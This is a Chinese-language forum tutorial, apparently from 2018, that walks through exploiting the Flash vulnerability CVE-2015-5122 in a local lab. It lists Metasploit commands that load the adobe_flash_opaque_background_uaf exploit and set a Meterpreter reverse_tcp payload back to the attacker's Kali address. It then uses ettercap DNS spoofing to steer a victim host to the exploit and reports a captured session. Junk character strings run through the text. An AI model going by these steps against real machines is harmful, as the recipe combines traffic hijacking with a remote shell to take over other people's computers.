cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

% y: @' ^; G8 Y8 j5 R3 Y 二、cve2015-5122漏洞实例演示虚拟机 + y; i8 O* V, O, I& F

" F8 U* h+ Z, S, l 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 8 T; M M. e. o) ?

/ G! O; h9 Y) k( q. K% a8 | search cve-2015-5122如图： + M. ]- m) U3 ]. v7 \4 ?

9 t; Y5 N0 g6 t/ G b- a 5 x/ o1 }2 [9 X, R6 k6 U

4 i2 i. ?- G, x7 d7 z& e% p" O) K 下面我们敲如下命令： 7 x9 W- o* {6 ]) ^8 G# k m+ o

% n: ~# X- _# ]2 G+ f use exploit/multi/browser/adobe_flash_opaque_background_uaf " ?/ r& @. a! m8 J

9 ` S- |) b* V1 K: a- u: d set PAYLOAD windows/meterpreter/reverse_tcp # I! ^/ m6 g( Q ~+ D

7 F4 f8 p; o0 \/ } set LHOST 192.168.0.109 1 f0 g2 Z6 L3 z+ @- f0 @

% e/ z5 `$ Z$ T6 ]; }/ @6 I' b' Y set URIPATH / /*根目录*/ 4 Z7 e8 \: J$ @/ m, L( r

/ ~( x+ ?2 t1 ]; L set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 o3 W* g: `0 u

2 t! ~/ h3 D" B% Z8 M set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ; P6 P' ]. l& T7 N" c+ ~0 v

9 P' C$ R/ n9 w6 L. k 然后show options如图： # w8 [/ e3 U. \) O& A* q6 h0 N

1 A' S, E& f$ v $ N; t7 h0 [' z" n" J) H) L, c

L5 m' F# i$ h1 @ 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
6 v5 V3 x, c3 e 3 \3 R* w* g. ]9 g: m

+ y& H! \- v( V" D" ^3 H 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 - j! O- n) ? v4 ^" p, W, G2 B

3 N! W; c3 U) @* ^ Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf & Z9 f& V: Z M) F" n

* k; j0 y9 o) c+ S 6 x& T3 q1 @# k: O

& Y, B4 J6 s/ S7 c 成功了，这时候我们断开ettercap，如图： " a P& }5 g( J

' o* t8 x# p0 x8 f7 i h4 O0 s 8 e* B7 e% E W' A

/ ~% ~ C# H2 y7 s: ^- N$ S Screenshot如图： : e/ J& T0 D; V5 y- ?

! m2 S3 k& J& G- C! T " ? |, |! u6 M, b

1 a8 g! q8 S+ A4 Y, [1 q : {( ]/ M# X5 y, A8 V, U% n

		自动登录	找回密码
密码			立即注册